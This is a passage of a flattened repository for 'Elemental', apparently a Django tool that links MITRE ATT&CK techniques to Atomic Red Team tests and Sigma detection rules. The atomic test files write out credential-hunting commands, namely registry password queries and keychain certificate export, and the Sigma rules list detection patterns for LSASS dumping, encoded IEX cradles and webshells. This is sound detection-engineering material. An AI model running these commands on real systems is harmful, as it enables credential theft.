├── elemental ├── matrix │ ├── __init__.py │ ├── migrations │ │ ├── __init__.py │ │ └── __pycache__ │ │ │ ├── __init__.cpython-36.pyc │ │ │ └── 0001_initial.cpython-36.pyc │ ├── templatetags │ │ ├── __init__.py │ │ ├── __pycache__ │ │ │ ├── __init__.cpython-36.pyc │ │ │ └── short_name.cpython-36.pyc │ │ └── short_name.py │ ├── tests.py │ ├── apps.py │ ├── templates │ │ ├── elemental.png │ │ └── matrix │ │ │ ├── atomic.html │ │ │ ├── tactic_detail.html │ │ │ ├── addSigma.html │ │ │ ├── noteForm.html │ │ │ ├── note_form.html │ │ │ ├── TacticTemplate.html │ │ │ ├── note_detail.html │ │ │ ├── addnote.html │ │ │ └── tactic_list.html │ ├── static │ │ └── matrix │ │ │ ├── elemental.png │ │ │ └── style.css │ ├── __pycache__ │ │ ├── urls.cpython-36.pyc │ │ ├── admin.cpython-36.pyc │ │ ├── forms.cpython-36.pyc │ │ ├── models.cpython-36.pyc │ │ ├── views.cpython-36.pyc │ │ └── __init__.cpython-36.pyc │ └── forms.py ├── elemental │ ├── __init__.py │ ├── __pycache__ │ │ ├── urls.cpython-36.pyc │ │ ├── wsgi.cpython-36.pyc │ │ ├── __init__.cpython-36.pyc │ │ └── settings.cpython-36.pyc │ └── wsgi.py ├── db.sqlite3 ├── media │ ├── elemental.png │ ├── atomics │ │ ├── T1152.yaml │ │ ├── T1169.yaml │ │ ├── T1147.yaml │ │ ├── T1214.yaml │ │ ├── T1151.yaml │ │ ├── T1163.yaml │ │ ├── T1496.yaml │ │ ├── T1122.yaml │ │ ├── T1144.yaml │ │ ├── T1030.yaml │ │ ├── T1128.yaml │ │ ├── T1150.yaml │ │ ├── T1196.yaml │ │ ├── T1009.yaml │ │ ├── T1127.yaml │ │ ├── T1103.yaml │ │ ├── T1097.yaml │ │ ├── T1005.yaml │ │ ├── T1142.yaml │ │ ├── T1031.yaml │ │ ├── T1154.yaml │ │ ├── T1179.yaml │ │ ├── T1042.yaml │ │ ├── T1073.yaml │ │ ├── T1132.yaml │ │ ├── T1038.yaml │ │ ├── T1056.yaml │ │ ├── T1059.yaml │ │ ├── T1134.yaml │ │ ├── T1115.yaml │ │ ├── T1100.yaml │ │ ├── T1124.yaml │ │ ├── T1208.yaml │ │ ├── T1207.yaml │ │ ├── T1010.yaml │ │ ├── T1153.yaml │ │ ├── T1500.yaml │ │ ├── T1518.yaml │ │ ├── T1030.md │ │ ├── T1057.yaml │ │ ├── T1148.yaml │ │ ├── T1058.yaml │ │ ├── T1114.yaml │ │ ├── T1143.yaml │ │ ├── T1139.yaml │ │ ├── T1160.yaml │ │ ├── T1206.yaml │ │ └── T1156.yaml │ └── sigma_rules │ │ ├── win_susp_wmi_login.yml │ │ ├── win_psexesvc_start.yml │ │ ├── win_susp_codeintegrity_check_failure.yml │ │ ├── sysmon_susp_driver_load.yml │ │ ├── win_susp_taskmgr_localsystem.yml │ │ ├── proxy_cobalt_ocsp.yml │ │ ├── sysmon_ghostpack_safetykatz.yml │ │ ├── win_susp_outlook_temp.yml │ │ ├── win_powershell_xor_commandline.yml │ │ ├── powershell_suspicious_download.yml │ │ ├── win_lethalhta.yml │ │ ├── win_susp_sam_dump.yml │ │ ├── apt_cloudhopper.yml │ │ ├── win_encoded_frombase64string.yml │ │ ├── win_susp_ntdsutil.yml │ │ ├── win_susp_rasdial_activity.yml │ │ ├── proxy_cobalt_onedrive.yml │ │ ├── win_admin_share_access.yml │ │ ├── win_susp_lsass_dump.yml │ │ ├── sysmon_wmi_event_subscription.yml │ │ ├── win_rare_schtask_creation.yml │ │ ├── apt_ta17_293a_ps.yml │ │ ├── apt_turla_service_png.yml │ │ ├── lnx_auditd_web_rce.yml │ │ ├── sysmon_quarkspw_filedump.yml │ │ ├── win_encoded_iex.yml │ │ ├── apt_carbonpaper_turla.yml │ │ ├── powershell_psattack.yml │ │ ├── sysmon_wmi_persistence_script_event_consumer_write.yml │ │ ├── win_wmi_backdoor_exchange_transport_agent.yml │ │ ├── win_susp_security_eventlog_cleared.yml │ │ ├── win_wmi_persistence_script_event_consumer.yml │ │ ├── apt_stonedrill.yml │ │ ├── win_powershell_b64_shellcode.yml │ │ ├── win_rare_service_installs.yml │ │ ├── apt_hurricane_panda.yml │ │ ├── win_susp_csc.yml │ │ ├── win_vul_java_remote_debugging.yml │ │ ├── win_win10_sched_task_0day.yml │ │ ├── apt_apt29_thinktanks.yml │ │ ├── sysmon_wmi_persistence_commandline_event_consumer.yml │ │ ├── win_mavinject_proc_inj.yml │ │ ├── win_netsh_port_fwd.yml │ │ ├── win_susp_backup_delete.yml │ │ ├── win_susp_dsrm_password_change.yml │ │ ├── win_control_panel_item.yml │ │ ├── win_netsh_port_fwd_3389.yml │ │ ├── sysmon_uac_bypass_sdclt.yml │ │ ├── win_sdbinst_shim_persistence.yml │ │ ├── win_susp_taskmgr_parent.yml │ │ ├── powershell_ntfs_ads_access.yml │ │ ├── apt_tropictrooper.yml │ │ ├── win_susp_eventlog_cleared.yml │ │ ├── net_susp_dns_txt_exec_strings.yml │ │ ├── win_apt_bluemashroom.yml │ │ ├── win_susp_sysvol_access.yml │ │ ├── sysmon_susp_powershell_rundll32.yml │ │ ├── win_mal_ursnif.yml │ │ ├── win_rdp_bluekeep_poc_scanner.yml │ │ ├── win_susp_tscon_localsystem.yml │ │ ├── win_susp_msiexec_cwd.yml │ │ ├── powershell_prompt_credentials.yml │ │ ├── win_susp_bcdedit.yml │ │ ├── win_netsh_fw_add.yml │ │ ├── win_impacket_secretdump.yml │ │ ├── win_susp_dhcp_config.yml │ │ ├── powershell_exe_calling_ps.yml │ │ ├── win_malware_dridex.yml │ │ ├── win_rdp_localhost_login.yml │ │ ├── powershell_suspicious_invocation_generic.yml │ │ ├── win_mal_wceaux_dll.yml │ │ ├── win_susp_ping_hex_ip.yml │ │ ├── win_cmdkey_recon.yml │ │ ├── win_susp_svchost.yml │ │ ├── win_usb_device_plugged.yml │ │ ├── sysmon_mimikatz_trough_winrm.yml │ │ ├── win_susp_dnx.yml │ │ ├── win_susp_interactive_logons.yml │ │ ├── win_susp_psr_capture_screenshots.yml │ │ ├── win_susp_schtask_creation.yml │ │ ├── apt_zxshell.yml │ │ ├── net_dns_c2_detection.yml │ │ ├── powershell_suspicious_keywords.yml │ │ ├── win_exploit_cve_2017_8759.yml │ │ ├── win_susp_iss_module_install.yml │ │ ├── win_susp_ps_appdata.yml │ │ ├── win_spn_enum.yml │ │ ├── win_susp_calc.yml │ │ ├── apt_bear_activity_gtr19.yml │ │ ├── sysmon_renamed_procdump.yml │ │ ├── sysmon_susp_image_load.yml │ │ ├── win_susp_ntlm_auth.yml │ │ ├── powershell_downgrade_attack.yml │ │ ├── win_susp_script_execution.yml │ │ ├── sysmon_lsass_memdump.yml │ │ ├── win_exploit_cve_2017_0261.yml │ │ ├── win_process_creation_bitsadmin_download.yml │ │ ├── win_susp_rottenpotato.yml │ │ ├── win_hack_smbexec.yml │ │ ├── win_rdp_potential_cve-2019-0708.yml │ │ ├── win_workflow_compiler.yml │ │ ├── powershell_shellcode_b64.yml │ │ ├── sysmon_rdp_reverse_tunnel.yml │ │ ├── win_mmc_spawn_shell.yml │ │ ├── win_susp_openwith.yml │ │ ├── win_susp_recon_activity.yml │ │ ├── win_user_added_to_local_administrators.yml │ │ ├── av_webshell.yml │ │ ├── sysmon_ads_executable.yml │ │ ├── sysmon_susp_lsass_dll_load.yml │ │ ├── win_exploit_cve_2015_1641.yml │ │ ├── lnx_auditd_masquerading_crond.yml │ │ ├── win_powershell_download.yml │ │ ├── win_susp_samr_pwset.yml │ │ ├── win_susp_tscon_rdp_redirect.yml │ │ ├── apt_equationgroup_dll_u_load.yml │ │ ├── sysmon_password_dumper_lsass.yml │ │ ├── win_netsh_packet_capture.yml │ │ ├── win_susp_bginfo.yml │ │ ├── win_susp_dxcap.yml │ │ ├── win_susp_outlook.yml │ │ ├── win_susp_rc4_kerberos.yml │ │ ├── apt_empiremonkey.yml │ │ ├── win_susp_cdb.yml │ │ ├── win_user_creation.yml │ │ ├── lnx_auditd_user_discovery.yml │ │ ├── sysmon_win_binary_github_com.yml │ │ ├── win_admin_rdp_login.yml │ │ ├── win_susp_add_sid_history.yml │ │ ├── win_susp_control_dll_load.yml │ │ ├── win_susp_dns_config.yml │ │ ├── crime_fireball.yml │ │ ├── win_susp_execution_path.yml │ │ ├── win_susp_sdelete.yml │ │ ├── win_wmi_spwns_powershell.yml │ │ ├── av_password_dumper.yml │ │ ├── win_susp_prog_location_process_starts.yml │ │ ├── win_atsvc_task.yml │ │ ├── win_overpass_the_hash.yml │ │ ├── sysmon_registry_persistence_key_linking.yml │ │ ├── web_cve_2018_2894_weblogic_exploit.yml │ │ ├── win_powershell_dll_execution.yml │ │ ├── win_susp_devtoolslauncher.yml │ │ ├── win_hack_rubeus.yml │ │ ├── apt_babyshark.yml │ │ ├── win_susp_rundll32_by_ordinal.yml │ │ ├── proxy_raw_paste_service_access.yml │ │ ├── sysmon_susp_download_run_key.yml │ │ ├── powershell_suspicious_invocation_specific.yml │ │ ├── sysmon_win_binary_susp_com.yml │ │ ├── win_exploit_cve_2017_11882.yml │ │ ├── win_susp_msoffice.yml │ │ ├── win_susp_whoami.yml │ │ ├── win_powershell_amsi_bypass.yml │ │ ├── win_service_execution.yml │ │ ├── win_webshell_spawn.yml │ │ ├── lnx_sudo_cve_2019_14287.yml │ │ ├── sysmon_cobaltstrike_process_injection.yml │ │ ├── win_susp_csc_folder.yml │ │ ├── sysmon_cactustorch.yml │ │ ├── win_mal_creddumper.yml │ │ ├── win_susp_execution_path_webserver.yml │ │ ├── apt_slingshot.yml │ │ ├── apt_sofacy.yml │ │ ├── powershell_data_compressed.yml │ │ ├── win_alert_lsass_access.yml │ │ ├── win_rdp_reverse_tunnel.yml │ │ └── win_susp_comsvcs_procdump.yml ├── __pycache__ │ ├── import_abbrvs.cpython-36.pyc │ ├── atomics_imports.cpython-36.pyc │ ├── attack_imports.cpython-36.pyc │ ├── attackcti_exporter.cpython-36.pyc │ └── sigma_rule_imports.cpython-36.pyc ├── requirements.txt └── manage.py └── images ├── 97.png ├── Atomic.png ├── Sigma.png ├── Technique.png ├── AtomicYaml.png └── elementalUI.png /elemental/matrix/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /elemental/elemental/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /elemental/matrix/migrations/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /elemental/matrix/templatetags/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /images/97.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/images/97.png -------------------------------------------------------------------------------- /elemental/matrix/tests.py: -------------------------------------------------------------------------------- 1 | from django.test import TestCase 2 | 3 | # Create your tests here. 4 | -------------------------------------------------------------------------------- /images/Atomic.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/images/Atomic.png -------------------------------------------------------------------------------- /images/Sigma.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/images/Sigma.png -------------------------------------------------------------------------------- /elemental/db.sqlite3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/db.sqlite3 -------------------------------------------------------------------------------- /images/Technique.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/images/Technique.png -------------------------------------------------------------------------------- /images/AtomicYaml.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/images/AtomicYaml.png -------------------------------------------------------------------------------- /images/elementalUI.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/images/elementalUI.png -------------------------------------------------------------------------------- /elemental/media/elemental.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/media/elemental.png -------------------------------------------------------------------------------- /elemental/matrix/apps.py: -------------------------------------------------------------------------------- 1 | from django.apps import AppConfig 2 | 3 | 4 | class MatrixConfig(AppConfig): 5 | name = 'matrix' 6 | -------------------------------------------------------------------------------- /elemental/matrix/templates/elemental.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/matrix/templates/elemental.png -------------------------------------------------------------------------------- /elemental/matrix/static/matrix/elemental.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/matrix/static/matrix/elemental.png -------------------------------------------------------------------------------- /elemental/matrix/__pycache__/urls.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/matrix/__pycache__/urls.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/__pycache__/import_abbrvs.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/__pycache__/import_abbrvs.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/matrix/__pycache__/admin.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/matrix/__pycache__/admin.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/matrix/__pycache__/forms.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/matrix/__pycache__/forms.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/matrix/__pycache__/models.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/matrix/__pycache__/models.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/matrix/__pycache__/views.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/matrix/__pycache__/views.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/__pycache__/atomics_imports.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/__pycache__/atomics_imports.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/__pycache__/attack_imports.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/__pycache__/attack_imports.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/elemental/__pycache__/urls.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/elemental/__pycache__/urls.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/elemental/__pycache__/wsgi.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/elemental/__pycache__/wsgi.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/matrix/__pycache__/__init__.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/matrix/__pycache__/__init__.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/__pycache__/attackcti_exporter.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/__pycache__/attackcti_exporter.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/__pycache__/sigma_rule_imports.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/__pycache__/sigma_rule_imports.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/elemental/__pycache__/__init__.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/elemental/__pycache__/__init__.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/elemental/__pycache__/settings.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/elemental/__pycache__/settings.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/matrix/templates/matrix/atomic.html: -------------------------------------------------------------------------------- 1 | {% extends "base_generic.html" %} 2 | 3 | {% block content %} 4 | 5 |
Summary: {{ tactic.tactic_description }}
8 | 9 | {% endblock %} 10 | 11 | -------------------------------------------------------------------------------- /elemental/matrix/templates/matrix/addSigma.html: -------------------------------------------------------------------------------- 1 | {% extends "base_generic.html" %} 2 | 3 | 4 | {% load short_name %} 5 | 6 | {% block title %}There are no Tactics.
15 | {% endif %} 16 | {% endblock %} -------------------------------------------------------------------------------- /elemental/media/atomics/T1214.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1214 3 | display_name: Credentials in Registry 4 | 5 | atomic_tests: 6 | - name: Enumeration for Credentials in Registry 7 | description: | 8 | Queries to enumerate for credentials in the Registry. 9 | 10 | supported_platforms: 11 | - windows 12 | 13 | executor: 14 | name: command_prompt 15 | elevation_required: false 16 | command: | 17 | reg query HKLM /f password /t REG_SZ /s 18 | reg query HKCU /f password /t REG_SZ /s 19 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1151.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1151 3 | display_name: Space After Filename 4 | 5 | atomic_tests: 6 | - name: Space After Filename 7 | description: | 8 | Space After Filename 9 | 10 | supported_platforms: 11 | - macos 12 | 13 | executor: 14 | name: manual 15 | steps: | 16 | 1. echo '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt 17 | 18 | 2. mv execute.txt "execute.txt " 19 | 20 | 3. ./execute.txt\ 21 | -------------------------------------------------------------------------------- /elemental/matrix/templates/matrix/note_detail.html: -------------------------------------------------------------------------------- 1 | {% extends "base_generic_no_header.html" %} 2 | 3 | {% block content %} 4 | 5 |{{note.date}}
7 | 8 |{{ note | safe }}
11 | {% endfor %}
12 |
13 |
20 |
21 | {% endblock %}
22 |
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_encoded_frombase64string.yml:
--------------------------------------------------------------------------------
1 | title: Encoded FromBase64String
2 | id: fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c
3 | status: experimental
4 | description: Detects a base64 encoded FromBase64String keyword in a process command line
5 | author: Florian Roth
6 | date: 2019/08/24
7 | tags:
8 | - attack.t1086
9 | - attack.t1140
10 | - attack.execution
11 | - attack.defense_evasion
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | CommandLine|base64offset|contains: '::FromBase64String'
18 | condition: selection
19 | fields:
20 | - CommandLine
21 | - ParentCommandLine
22 | falsepositives:
23 | - unknown
24 | level: critical
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_ntdsutil.yml:
--------------------------------------------------------------------------------
1 | title: Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)
2 | id: 2afafd61-6aae-4df4-baed-139fa1f4c345
3 | description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)
4 | status: experimental
5 | references:
6 | - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm
7 | author: Thomas Patzke
8 | tags:
9 | - attack.credential_access
10 | - attack.t1003
11 | logsource:
12 | category: process_creation
13 | product: windows
14 | detection:
15 | selection:
16 | CommandLine: '*\ntdsutil*'
17 | condition: selection
18 | falsepositives:
19 | - NTDS maintenance
20 | level: high
21 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_rasdial_activity.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious RASdial Activity
2 | id: 6bba49bf-7f8c-47d6-a1bb-6b4dece4640e
3 | description: Detects suspicious process related to rasdial.exe
4 | status: experimental
5 | references:
6 | - https://twitter.com/subTee/status/891298217907830785
7 | author: juju4
8 | tags:
9 | - attack.defense_evasion
10 | - attack.execution
11 | - attack.t1064
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | CommandLine:
18 | - rasdial
19 | condition: selection
20 | falsepositives:
21 | - False positives depend on scripts and administrative tools used in the monitored environment
22 | level: medium
23 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1142.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1142
3 | display_name: Keychain
4 |
5 | atomic_tests:
6 | - name: Keychain
7 | description: |
8 | ### Keychain Files
9 |
10 | ~/Library/Keychains/
11 |
12 | /Library/Keychains/
13 |
14 | /Network/Library/Keychains/
15 |
16 | [Security Reference](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/security.1.html)
17 |
18 | [Keychain dumper](https://github.com/juuso/keychaindump)
19 |
20 |
21 | supported_platforms:
22 | - macos
23 |
24 | executor:
25 | name: sh
26 | command: |
27 | security -h
28 | security find-certificate -a -p > allcerts.pem
29 | security import /tmp/certs.pem -k
30 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/proxy_cobalt_onedrive.yml:
--------------------------------------------------------------------------------
1 | title: CobaltStrike Malleable OneDrive browsing traffic profile
2 | id: c9b33401-cc6a-4cf6-83bb-57ddcb2407fc
3 | status: experimental
4 | description: Detects Malleable OneDrive Profile
5 | references:
6 | - https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/onedrive_getonly.profile
7 | author: Markus Neis
8 | tags:
9 | - attack.t1102
10 | logsource:
11 | category: proxy
12 | detection:
13 | selection:
14 | cs-method: 'GET'
15 | c-uri: '*?manifest=wac'
16 | cs-host: 'onedrive.live.com'
17 | filter:
18 | c-uri: 'http*://onedrive.live.com/*'
19 | condition: selection and not filter
20 | falsepositives:
21 | - Unknown
22 | level: high
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_admin_share_access.yml:
--------------------------------------------------------------------------------
1 | title: Access to ADMIN$ Share
2 | id: 098d7118-55bc-4912-a836-dc6483a8d150
3 | description: Detects access to $ADMIN share
4 | tags:
5 | - attack.lateral_movement
6 | - attack.t1077
7 | status: experimental
8 | author: Florian Roth
9 | logsource:
10 | product: windows
11 | service: security
12 | definition: 'The advanced audit policy setting "Object Access > Audit File Share" must be configured for Success/Failure'
13 | detection:
14 | selection:
15 | EventID: 5140
16 | ShareName: Admin$
17 | filter:
18 | SubjectUserName: '*$'
19 | condition: selection and not filter
20 | falsepositives:
21 | - Legitimate administrative activity
22 | level: low
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_lsass_dump.yml:
--------------------------------------------------------------------------------
1 | title: Password Dumper Activity on LSASS
2 | id: aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c
3 | description: Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN
4 | status: experimental
5 | references:
6 | - https://twitter.com/jackcr/status/807385668833968128
7 | tags:
8 | - attack.credential_access
9 | - attack.t1003
10 | logsource:
11 | product: windows
12 | service: security
13 | detection:
14 | selection:
15 | EventID: 4656
16 | ProcessName: 'C:\Windows\System32\lsass.exe'
17 | AccessMask: '0x705'
18 | ObjectType: 'SAM_DOMAIN'
19 | condition: selection
20 | falsepositives:
21 | - Unkown
22 | level: high
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_wmi_event_subscription.yml:
--------------------------------------------------------------------------------
1 | title: WMI Event Subscription
2 | id: 0f06a3a5-6a09-413f-8743-e6cf35561297
3 | status: experimental
4 | description: Detects creation of WMI event subscription persistence method
5 | references:
6 | - https://attack.mitre.org/techniques/T1084/
7 | tags:
8 | - attack.t1084
9 | - attack.persistence
10 | author: Tom Ueltschi (@c_APT_ure)
11 | date: 2019/01/12
12 | logsource:
13 | product: windows
14 | service: sysmon
15 | detection:
16 | selector:
17 | EventID:
18 | - 19
19 | - 20
20 | - 21
21 | condition: selector
22 | falsepositives:
23 | - exclude legitimate (vetted) use of WMI event subscription in your network
24 | level: high
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_rare_schtask_creation.yml:
--------------------------------------------------------------------------------
1 | title: Rare Scheduled Task Creations
2 | id: b20f6158-9438-41be-83da-a5a16ac90c2b
3 | status: experimental
4 | description: This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count
5 | function selects tasks with rare names.
6 | tags:
7 | - attack.persistence
8 | - attack.t1053
9 | - attack.s0111
10 | author: Florian Roth
11 | logsource:
12 | product: windows
13 | service: taskscheduler
14 | detection:
15 | selection:
16 | EventID: 106
17 | timeframe: 7d
18 | condition: selection | count() by TaskName < 5
19 | falsepositives:
20 | - Software installation
21 | level: low
22 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_ta17_293a_ps.yml:
--------------------------------------------------------------------------------
1 | title: Ps.exe Renamed SysInternals Tool
2 | id: 18da1007-3f26-470f-875d-f77faf1cab31
3 | description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
4 | references:
5 | - https://www.us-cert.gov/ncas/alerts/TA17-293A
6 | tags:
7 | - attack.defense_evasion
8 | - attack.g0035
9 | - attack.t1036
10 | - car.2013-05-009
11 | author: Florian Roth
12 | date: 2017/10/22
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | CommandLine: 'ps.exe -accepteula'
19 | condition: selection
20 | falsepositives:
21 | - Renamed SysInternals tool
22 | level: high
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_turla_service_png.yml:
--------------------------------------------------------------------------------
1 | title: Turla PNG Dropper Service
2 | id: 1228f8e2-7e79-4dea-b0ad-c91f1d5016c1
3 | description: This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018
4 | references:
5 | - https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/
6 | author: Florian Roth
7 | date: 2018/11/23
8 | tags:
9 | - attack.persistence
10 | - attack.g0010
11 | - attack.t1050
12 | logsource:
13 | product: windows
14 | service: system
15 | detection:
16 | selection:
17 | EventID: 7045
18 | ServiceName: 'WerFaultSvc'
19 | condition: selection
20 | falsepositives:
21 | - unlikely
22 | level: critical
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/lnx_auditd_web_rce.yml:
--------------------------------------------------------------------------------
1 | title: Webshell Remote Command Execution
2 | id: c0d3734d-330f-4a03-aae2-65dacc6a8222
3 | status: experimental
4 | description: Detects posible command execution by web application/web shell
5 | tags:
6 | - attack.persistence
7 | - attack.t1100
8 | references:
9 | - personal experience
10 | author: Ilyas Ochkov, Beyu Denis, oscd.community
11 | date: 2019/10/12
12 | modified: 2019/11/04
13 | logsource:
14 | product: linux
15 | service: auditd
16 | detection:
17 | selection:
18 | type: 'SYSCALL'
19 | SYSCALL: 'execve'
20 | key: 'detect_execve_www'
21 | condition: selection
22 | falsepositives:
23 | - Admin activity
24 | - Crazy web applications
25 | level: critical
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_quarkspw_filedump.yml:
--------------------------------------------------------------------------------
1 | title: QuarksPwDump Dump File
2 | id: 847def9e-924d-4e90-b7c4-5f581395a2b4
3 | status: experimental
4 | description: Detects a dump file written by QuarksPwDump password dumper
5 | references:
6 | - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm
7 | author: Florian Roth
8 | date: 2018/02/10
9 | tags:
10 | - attack.credential_access
11 | - attack.t1003
12 | level: critical
13 | logsource:
14 | product: windows
15 | service: sysmon
16 | detection:
17 | selection:
18 | # Sysmon: File Creation (ID 11)
19 | EventID: 11
20 | TargetFilename: '*\AppData\Local\Temp\SAM-*.dmp*'
21 | condition: selection
22 | falsepositives:
23 | - Unknown
24 |
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_encoded_iex.yml:
--------------------------------------------------------------------------------
1 | title: Encoded IEX
2 | id: 88f680b8-070e-402c-ae11-d2914f2257f1
3 | status: experimental
4 | description: Detects a base64 encoded IEX command string in a process command line
5 | author: Florian Roth
6 | date: 2019/08/23
7 | tags:
8 | - attack.t1086
9 | - attack.t1140
10 | - attack.execution
11 | logsource:
12 | category: process_creation
13 | product: windows
14 | detection:
15 | selection:
16 | CommandLine|base64offset|contains:
17 | - 'IEX (['
18 | - 'iex (['
19 | - 'iex (New'
20 | - 'IEX (New'
21 | condition: selection
22 | fields:
23 | - CommandLine
24 | - ParentCommandLine
25 | falsepositives:
26 | - unknown
27 | level: critical
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_carbonpaper_turla.yml:
--------------------------------------------------------------------------------
1 | title: Turla Service Install
2 | id: 1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4
3 | description: This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET
4 | references:
5 | - https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/
6 | tags:
7 | - attack.persistence
8 | - attack.g0010
9 | - attack.t1050
10 | logsource:
11 | product: windows
12 | service: system
13 | detection:
14 | selection:
15 | EventID: 7045
16 | ServiceName:
17 | - 'srservice'
18 | - 'ipvpn'
19 | - 'hkmsvc'
20 | condition: selection
21 | falsepositives:
22 | - Unknown
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_psattack.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell PSAttack
2 | id: b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5
3 | status: experimental
4 | description: Detects the use of PSAttack PowerShell hack tool
5 | references:
6 | - https://adsecurity.org/?p=2921
7 | tags:
8 | - attack.execution
9 | - attack.t1086
